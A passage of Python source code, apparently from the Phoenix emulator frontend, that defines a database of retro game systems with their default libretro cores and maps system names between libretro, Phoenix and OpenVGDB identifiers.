        "Sinclair - ZX81":                                  {"enabled": False, "defaultCore": "81_libretro",                        "friendlyName": "",                    "shortName": "", "manufacturer": "Sinclair"        },
        "SNK - Neo Geo":                                    {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "SNK"             },

        # No-Intro, both official and non-official (ROM-based games)
        "Atari - 5200":                                     {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Atari - 7800":                                     {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Atari - Jaguar":                                   {"enabled": True,  "defaultCore": "virtualjaguar_libretro",             "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Atari - Lynx":                                     {"enabled": True,  "defaultCore": "mednafen_lynx_libretro",             "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Atari - ST":                                       {"enabled": True,  "defaultCore": "hatari_libretro",                    "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Bandai - WonderSwan Color":                        {"enabled": True,  "defaultCore": "mednafen_wswan_libretro",            "friendlyName": "",                    "shortName": "", "manufacturer": "Bandai"          },
        "Bandai - WonderSwan":                              {"enabled": True,  "defaultCore": "mednafen_wswan_libretro",            "friendlyName": "",                    "shortName": "", "manufacturer": "Bandai"          },
        "Casio - Loopy":                                    {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Casio"           },
        "Casio - PV-1000":                                  {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Casio"           },
        "Coleco - ColecoVision":                            {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Coleco"          },
        #"Commodore - 64 (PP)":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        #"Commodore - 64 (Tapes)":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - 64":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - Amiga":                                {"enabled": True,  "defaultCore": "puae_libretro",                      "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - Plus-4":                               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - VIC-20":                               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Emerson - Arcadia 2001":                           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Emerson"         },
        "Entex - Adventure Vision":                         {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Entex"           },
        "Epoch - Super Cassette Vision":                    {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Epoch"           },
        "Fairchild - Channel F":                            {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Fairchild"       },
        "Funtech - Super Acan":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Funtech"         },
        "GamePark - GP32":                                  {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "GamePark"        },
        "GCE - Vectrex":                                    {"enabled": True,  "defaultCore": "vecx_libretro",                      "friendlyName": "",                    "shortName": "", "manufacturer": "GCE"             },
        "Hartung - Game Master":                            {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Hartung"         },
        "LeapFrog - Leapster Learning Game System":         {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "LeapFrog"        },
        "Magnavox - Odyssey2":                              {"enabled": False, "defaultCore": "o2em_libretro",                      "friendlyName": u"Odyssey²",           "shortName": "", "manufacturer": "Magnavox"        },
        "Microsoft - MSX 2":                                {"enabled": False, "defaultCore": "bluemsx_libretro",                   "friendlyName": "MSX2",                "shortName": "", "manufacturer": "Microsoft"       },
        "Microsoft - MSX":                                  {"enabled": False, "defaultCore": "bluemsx_libretro",                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        #"Microsoft - XBOX 360 (DLC)":                      {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        #"Microsoft - XBOX 360 (Games on Demand)":          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        #"Microsoft - XBOX 360 (Title Updates)":            {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        "NEC - PC Engine - TurboGrafx 16":                  {"enabled": True,  "defaultCore": "mednafen_pce_fast_libretro",         "friendlyName": "TurboGrafx 16",       "shortName": "", "manufacturer": "NEC"             },
        "NEC - Super Grafx":                                {"enabled": True,  "defaultCore": "mednafen_supergrafx_libretro",       "friendlyName": "SuperGrafx",          "shortName": "", "manufacturer": "NEC"             },
        #"Nintendo - Famicom Disk System":                  {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Game Boy Advance (e-Cards)":            {"enabled": True,  "defaultCore": "vbam_libretro",                      "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Game Boy Advance":                      {"enabled": True,  "defaultCore": "vbam_libretro",                      "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Game Boy Color":                        {"enabled": True,  "defaultCore": "gambatte_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Game Boy":                              {"enabled": True,  "defaultCore": "gambatte_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        #"Nintendo - New Nintendo 3DS (DLC)":               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - New Nintendo 3DS":                      {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        #"Nintendo - Nintendo 3DS (DLC)":                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Nintendo 3DS":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Nintendo 64":                           {"enabled": True,  "defaultCore": "mupen64plus_libretro",               "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        #"Nintendo - Nintendo DS (Download Play) (BETA)":   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Nintendo DS":                           {"enabled": True,  "defaultCore": "desmume_libretro",                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        #"Nintendo - Nintendo DSi (DLC)":                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Nintendo DSi":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Nintendo Entertainment System":         {"enabled": True,  "defaultCore": "fceumm_libretro",                    "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        #"Nintendo - Nintendo Wii (DLC)":                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Pokemon Mini":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Satellaview":                           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Sufami Turbo":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Super Nintendo Entertainment System":   {"enabled": True,  "defaultCore": "bsnes_mercury_balanced_libretro",    "friendlyName": "Super Nintendo",      "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Virtual Boy":                           {"enabled": True,  "defaultCore": "mednafen_vb_libretro",               "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nokia - N-Gage":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nokia"           },
        "Philips - Videopac+":                              {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Philips"         },
        "RCA - Studio II":                                  {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "RCA"             },
        "Sega - 32X":                                       {"enabled": True,  "defaultCore": "picodrive_libretro",                 "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Game Gear":                                 {"enabled": True,  "defaultCore": "genesis_plus_gx_libretro",           "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Master System - Mark III":                  {"enabled": False, "defaultCore": "emux_sms_libretro",                  "friendlyName": "Master System",       "shortName": "", "manufacturer": "Sega"            },
        "Sega - Mega Drive - Genesis":                      {"enabled": True,  "defaultCore": "genesis_plus_gx_libretro",           "friendlyName": "Genesis",             "shortName": "", "manufacturer": "Sega"            },
        "Sega - PICO":                                      {"enabled": True,  "defaultCore": "picodrive_libretro",                 "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - SG-1000":                                   {"enabled": True,  "defaultCore": "genesis_plus_gx_libretro",           "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sinclair - ZX Spectrum +3":                        {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sinclair"        },
        "SNK - Neo Geo Pocket Color":                       {"enabled": True,  "defaultCore": "mednafen_ngp_libretro",              "friendlyName": "",                    "shortName": "", "manufacturer": "SNK"             },
        "SNK - Neo Geo Pocket":                             {"enabled": True,  "defaultCore": "mednafen_ngp_libretro",              "friendlyName": "",                    "shortName": "", "manufacturer": "SNK"             },
        #"Sony - PlayStation 3 (DLC)":                      {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation 3 (Downloadable)":             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation 3 (PSN)":                      {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation Portable (DLC)":               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation Portable (PSN)":               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation Portable (PSX2PSP)":           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation Portable (UMD Music)":         {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation Portable (UMD Video)":         {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        "Sony - PlayStation Portable":                      {"enabled": True,  "defaultCore": "ppsspp_libretro",                    "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        "Tiger - Game.com":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Tiger"           },
        "Tiger - Gizmondo":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Tiger"           },
        "VTech - CreatiVision":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "VTech"           },
        "VTech - V.Smile":                                  {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "VTech"           },
        "Watara - Supervision":                             {"enabled": True,  "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Watara"          },

        # Redump.org (disc-based games)
        "Apple - Macintosh":                                {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Apple"           },
        "Bandai - Playdia":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Bandai"          },
        "Bandai / Apple - Pippin":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Bandai / Apple"  },
        "Commodore - Amiga CD":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - Amiga CD32":                           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - Amiga CDTV":                           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Fujitsu - FM Towns series":                        {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Fujitsu"         },
        "IBM PC compatible":                                {"enabled": False, "defaultCore": "",                                   "friendlyName": "PC",                  "shortName": "", "manufacturer": "(Various)"       },
        "Mattel - HyperScan":                               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Mattel"          },
        "Microsoft - Xbox":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        "Namco / Sega / Nintendo - Triforce":               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "NEC - PC Engine CD - TurboGrafx-CD":               {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "TurboGrafx-CD",       "shortName": "", "manufacturer": "NEC"             },
        "NEC - PC-88 series":                               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "NEC"             },
        "NEC - PC-98 series":                               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "NEC"             },
        "NEC - PC-FX - PC-FXGA":                            {"enabled": False, "defaultCore": "mednafen_pcfx_libretro",             "friendlyName": "",                    "shortName": "", "manufacturer": "NEC"             },
        "Nintendo - GameCube":                              {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Palm OS":                                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Palm"            },
        "Panasonic - 3DO Interactive Multiplayer":          {"enabled": False, "defaultCore": "4do_libretro",                       "friendlyName": "",                    "shortName": "", "manufacturer": "Panasonic"       },
        "Philips - CD-i":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Philips"         },
        "Photo - CD":                                       {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "(Various)"       },
        "Sega - Chihiro":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Dreamcast":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Lindbergh":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Mega-CD":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Naomi":                                     {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Saturn":                                    {"enabled": True,  "defaultCore": "yabause_libretro",                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "SNK - Neo Geo CD":                                 {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "SNK"             },
        "Sony - PlayStation 2":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        "Sony - PlayStation":                               {"enabled": True,  "defaultCore": "mednafen_psx_libretro",              "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        "VTech - V.Flash":                                  {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "VTech"           },

        # Seventh-generation consoles (circa 2005)
        "Microsoft - Xbox 360":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        "Nintendo - Wii":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Sony - PlayStation 3":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },

        # Eighth-generation consoles (circa 2012)
        "Microsoft - Xbox One":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        "Nintendo - Wii U":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Sony - PlayStation 4":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        
        # Ninth-generation consoles (circa 2017)
        "Microsoft - Xbox One X":                           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        "Nintendo - Switch":                                {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
}

    def phoenixSystems(self):
        return OrderedDict(sorted(self.phoenixSystemDatabase.items(), key=lambda t: t[0]))

    def libretroToPhoenix(self, libretroSystem):
        return self.libretroToPhoenixMap[libretroSystem]

    # This map essentially says "Register this Libretro core for this (these) Phoenix system(s)" when a .info file claims support for that system
    # If a core claims support for some Libretro ID, register that core for each Phoenix ID
    libretroToPhoenixMap = {
        "3DO":                                                      {"Panasonic - 3DO Interactive Multiplayer"},
        "Arcade (various)":                                         {"Arcade"},
        "Atari - 2600":                                             {"Atari - 2600"},
        "Atari - 5200":                                             {"Atari - 5200"},
        "Atari - 7800":                                             {"Atari - 7800"},
        "Atari - Jaguar":                                           {"Atari - Jaguar"},
        "Atari - Lynx":                                             {"Atari - Lynx"},
        "Atari ST/STE/TT/Falcon":                                   {"Atari - ST"},
        "Bandai - WonderSwan Color":                                {"Bandai - WonderSwan Color"},
        "Bandai - WonderSwan":                                      {"Bandai - WonderSwan"},
        "CHIP-8":                                                   {"CHIP-8"},
        "Commodore Amiga":                                          {"Commodore - Amiga"},
        "Commodore - C128":                                         {"Arcade"},
        "Commodore - 64":                                           {"Commodore - 64"},
        "CP System I":                                              {"Capcom - CP System I"},
        "CP System II":                                             {"Capcom - CP System II"},
        "CP System III":                                            {"Capcom - CP System III"},
        "CPC":                                                      {"Amstrad - CPC"},
        "DOS":                                                      {"DOS"},
        "FB Alpha - Arcade Games":                                  {"Arcade"},
        "GCE - Vectrex":                                            {"GCE - Vectrex"},
        "Handheld Electronic Game":                                 {"Nintendo - Game & Watch"},
        "IBM PC compatible":                                        {"IBM PC compatible"},
        "Magnavox - Odyssey2":                                      {"Magnavox - Odyssey2"},
        "MAME":                                                     {"Arcade"},
        "MAME2003":                                                 {"Arcade"},
        "Microsoft - MSX 2":                                        {"Microsoft - MSX 2"},
        "Microsoft - MSX2":                                         {"Microsoft - MSX 2"},
        "Microsoft - MSX":                                          {"Microsoft - MSX"},

        # MESS and UME
        # http://nonmame.retrogames.com/
        "MULTI (various)":                                          {
                                                                     "Atari - 2600",
                                                                     "Atari - 5200",
                                                                     "Atari - 7800",
                                                                     "Atari - Lynx",
                                                                     "Bandai - WonderSwan Color"
                                                                     "Bandai - WonderSwan",
                                                                     "Capcom - CPS Changer",
                                                                     "Coleco - ColecoVision",
                                                                     "Fujitsu - FM Towns series",
                                                                     "Magnavox - Odyssey2",
                                                                     "Mattel - Intellivision",
                                                                     "NEC - PC Engine - TurboGrafx 16",
                                                                     "NEC - PC Engine CD - TurboGrafx-CD",
                                                                     "NEC - Super Grafx",
                                                                     "Nintendo - Game Boy Advance",
                                                                     "Nintendo - Game Boy",
                                                                     "Philips - Videopac+",
                                                                     "RCA - Studio II",
                                                                     "Sega - Game Gear",
                                                                     "Sega - Master System - Mark III",
                                                                     "Sega - Mega Drive - Genesis",
                                                                     "Sega - PICO",
                                                                     "Sega - SG-1000",
                                                                     "SNK - Neo Geo CD",
                                                                     "SNK - Neo Geo",
                                                                     "Watara - Supervision",
                                                                    },

        "NEC - PC Engine - TurboGrafx 16":                          {"NEC - PC Engine - TurboGrafx 16"},
        "NEC - PC Engine SuperGrafx":                               {"NEC - Super Grafx"},
        "NEC - PC Engine CD - TurboGrafx-CD":                       {"NEC - Super Grafx"},
        "NEC - PC-FX":                                              {"NEC - PC-FX - PC-FXGA"},
        "NEC - Super Grafx":                                        {"NEC - Super Grafx"},
        "Neo Geo":                                                  {"SNK - Neo Geo"},
        "Nintendo - 3DS":                                           {"Nintendo - Nintendo 3DS"},
        "Nintendo - Family Computer Disk System":                   {"Nintendo - Nintendo Entertainment System"},
        "Nintendo - Famicom Disk System":                           {"Nintendo - Nintendo Entertainment System"},
        "Nintendo - Game & Watch":                                  {"Nintendo - Game & Watch"},
        "Nintendo - Game Boy Advance (e-Cards)":                    {"Nintendo - Game Boy Advance (e-Cards)"},
        "Nintendo - Game Boy Advance":                              {"Nintendo - Game Boy Advance"},
        "Nintendo - Game Boy Color":                                {"Nintendo - Game Boy Color"},
        "Nintendo - Game Boy":                                      {"Nintendo - Game Boy"},
        "Nintendo - GameCube":                                      {"Nintendo - GameCube"},
        "Nintendo - Nintendo 64":                                   {"Nintendo - Nintendo 64"},
        "Nintendo - Nintendo 64DD":                                 {"Nintendo - Nintendo 64"},
        "Nintendo - Nintendo DS":                                   {"Nintendo - Nintendo DS"},
        "Nintendo - Nintendo DS (Download Play)":                   {"Nintendo - Nintendo DS"},
        "Nintendo - Nintendo DS (Download Play) (BETA)":            {"Nintendo - Nintendo DS"},
        "Nintendo - Nintendo DS Decrypted":                         {"Nintendo - Nintendo DS"},
        "Nintendo - Nintendo Entertainment System":                 {"Nintendo - Nintendo Entertainment System"},
        "Nintendo - Pokemon Mini":                                  {"Nintendo - Pokemon Mini"},
        "Nintendo - Sufami Turbo":                                  {"Nintendo - Sufami Turbo"},
        "Nintendo - Super Nintendo Entertainment System":           {"Nintendo - Super Nintendo Entertainment System"},
        "Nintendo - Virtual Boy":                                   {"Nintendo - Virtual Boy"},
        "Nintendo - Wii":                                           {"Nintendo - Wii"},
        "PC":                                                       {"IBM PC compatible"},
        "PC-FX":                                                    {"NEC - PC-FX - PC-FXGA"},
        "PC-98":                                                    {"NEC - PC-98 series"},
        "Phillips - Videopac+":                                     {"Philips - Videopac+"},
        "Sega - 32X":                                               {"Sega - 32X"},
        "Sega - Dreamcast":                                         {"Sega - Dreamcast"},
        "Sega - Game Gear":                                         {"Sega - Game Gear"},
        "Sega - Master System - Mark III":                          {"Sega - Master System - Mark III"},
        "Sega - Mega Drive - Genesis":                              {"Sega - Mega Drive - Genesis"},
        "Sega - Mega-CD - Sega CD":                                 {"Sega - Mega-CD"},
        "Sega - NAOMI":                                             {"Sega - Naomi"},
        "Sega - PICO":                                              {"Sega - PICO"},
        "Sega - Saturn":                                            {"Sega - Saturn"},
        "Sega - SG-1000":                                           {"Sega - SG-1000"},
        "Sharp - X68000":                                           {"Arcade"},
        "Sinclair - ZX 81":                                         {"Sinclair - ZX81"},
        "Sinclair - ZX Spectrum":                                   {"Sinclair - ZX Spectrum +3"},
        "Sinclair - ZX Spectrum +3":                                {"Sinclair - ZX Spectrum +3"},
        "SNK - Neo Geo Pocket Color":                               {"SNK - Neo Geo Pocket Color"},
        "SNK - Neo Geo Pocket":                                     {"SNK - Neo Geo Pocket"},
        "Sony - PlayStation Portable":                              {"Sony - PlayStation Portable"},
        "Sony - PlayStation":                                       {"Sony - PlayStation"},
        "The 3DO Company - 3DO":                                    {"Panasonic - 3DO Interactive Multiplayer"},
        "Uzebox":                                                   {"Arcade"},
        "ZX Spectrum (various)":                                    {"Sinclair - ZX Spectrum +3"},
    }

    # Not all Phoenix IDs are availble in OpenVGDB, fail silently and gracefully if a match isn't found
    def phoenixToOpenVGDB(self, phoenixID):
        ret = ""
        try:
            ret = self.phoenixToOpenVGDBMap[phoenixID]
        except KeyError:
            ret = ""
        return ret

    phoenixToOpenVGDBMap = {
        "Panasonic - 3DO Interactive Multiplayer": "3DO Interactive Multiplayer",
        "Arcade": "Arcade",
        "Atari - 2600": "Atari 2600",
        "Atari - 5200": "Atari 5200",
        "Atari - 7800": "Atari 7800",
        "Atari - Jaguar": "Atari Jaguar CD",
        "Atari - Jaguar": "Atari Jaguar",
        "Atari - Lynx": "Atari Lynx",
        "Bandai - WonderSwan Color": "Bandai WonderSwan Color",
        "Bandai - WonderSwan": "Bandai WonderSwan",
        "Coleco - ColecoVision": "Coleco ColecoVision",
        "GCE - Vectrex": "GCE Vectrex",
        "Mattel - Intellivision": "Intellivision",
        "Magnavox - Odyssey2": "Magnavox Odyssey2",
        "NEC - PC Engine CD - TurboGrafx-CD": "NEC PC Engine CD/TurboGrafx-CD",
        "NEC - PC Engine - TurboGrafx 16": "NEC PC Engine/TurboGrafx-16",
        "NEC - PC-FX - PC-FXGA": "NEC PC-FX",
        "NEC - Super Grafx": "NEC SuperGrafx",
        "Nintendo - Nintendo 64": "Nintendo 64",
        "Nintendo - Nintendo DS": "Nintendo DS",
        "Nintendo - Nintendo Entertainment System": "Nintendo Entertainment System",
        "Nintendo - Nintendo Entertainment System": "Nintendo Famicom Disk System",
        "Nintendo - Game Boy Advance": "Nintendo Game Boy Advance",
        "Nintendo - Game Boy Color": "Nintendo Game Boy Color",
        "Nintendo - Game Boy": "Nintendo Game Boy",
        "Nintendo - GameCube": "Nintendo GameCube",
        "Nintendo - Super Nintendo Entertainment System": "Nintendo Super Nintendo Entertainment System",
        "Nintendo - Virtual Boy": "Nintendo Virtual Boy",
        "Nintendo - Wii": "Nintendo Wii",
        "Sega - 32X": "Sega 32X",
        "Sega - Mega-CD": "Sega CD/Mega-CD",
        "Sega - Game Gear": "Sega Game Gear",
        "Sega - Mega Drive - Genesis": "Sega Genesis/Mega Drive",
        "Sega - Master System - Mark III": "Sega Master System",
        "Sega - Saturn": "Sega Saturn",
        "Sega - SG-1000": "Sega SG-1000",
        "SNK - Neo Geo Pocket Color": "SNK Neo Geo Pocket Color",
        "SNK - Neo Geo Pocket": "SNK Neo Geo Pocket",
        "Sony - PlayStation Portable": "Sony PlayStation Portable",
        "Sony - PlayStation": "Sony PlayStation",
    }

    def getOpenVGDBToPhoenixMap(self):
        return OrderedDict(sorted(self.openVGDBToPhoenixMap.items(), key=lambda t: t[0]))

    openVGDBToPhoenixMap = {
        "3DO Interactive Multiplayer": "Panasonic - 3DO Interactive Multiplayer",
        "Arcade": "Arcade",
        "Atari 2600": "Atari - 2600",
        "Atari 5200": "Atari - 5200",
        "Atari 7800": "Atari - 7800",
        "Atari Jaguar CD": "Atari - Jaguar",
        "Atari Jaguar": "Atari - Jaguar",
        "Atari Lynx": "Atari - Lynx",
        "Bandai WonderSwan Color": "Bandai - WonderSwan Color",
        "Bandai WonderSwan": "Bandai - WonderSwan",
        "Coleco ColecoVision": "Coleco - ColecoVision",
        "GCE Vectrex": "GCE - Vectrex",
        "Intellivision": "Mattel - Intellivision",
        "Magnavox Odyssey2": "Magnavox - Odyssey2",
        "NEC PC Engine CD/TurboGrafx-CD": "NEC - PC Engine CD - TurboGrafx-CD",
        "NEC PC Engine/TurboGrafx-16": "NEC - PC Engine - TurboGrafx 16",
        "NEC PC-FX": "NEC - PC-FX - PC-FXGA",
        "NEC SuperGrafx": "NEC - Super Grafx",
        "Nintendo 64": "Nintendo - Nintendo 64",
        "Nintendo DS": "Nintendo - Nintendo DS",
        "Nintendo Entertainment System": "Nintendo - Nintendo Entertainment System",
        "Nintendo Famicom Disk System": "Nintendo - Nintendo Entertainment System",
        "Nintendo Game Boy Advance": "Nintendo - Game Boy Advance",
        "Nintendo Game Boy Color": "Nintendo - Game Boy Color",
        "Nintendo Game Boy": "Nintendo - Game Boy",
        "Nintendo GameCube": "Nintendo - GameCube",
        "Nintendo Super Nintendo Entertainment System": "Nintendo - Super Nintendo Entertainment System",
        "Nintendo Virtual Boy": "Nintendo - Virtual Boy",
        "Nintendo Wii": "Nintendo - Wii",
        "Sega 32X": "Sega - 32X",
        "Sega CD/Mega-CD": "Sega - Mega-CD",
        "Sega Game Gear": "Sega - Game Gear",
        "Sega Genesis/Mega Drive": "Sega - Mega Drive - Genesis",
        "Sega Master System": "Sega - Master System - Mark III",
        "Sega Saturn": "Sega - Saturn",
        "Sega SG-1000": "Sega - SG-1000",
        "SNK Neo Geo Pocket Color": "SNK - Neo Geo Pocket Color",
        "SNK Neo Geo Pocket": "SNK - Neo Geo Pocket",
        "Sony PlayStation Portable": "Sony - PlayStation Portable",
        "Sony PlayStation": "Sony - PlayStation",
    }

    def filterUnusedCores(self):
        for key in self.coreInfo["cores"].keys():
            if (

                # No reason specified
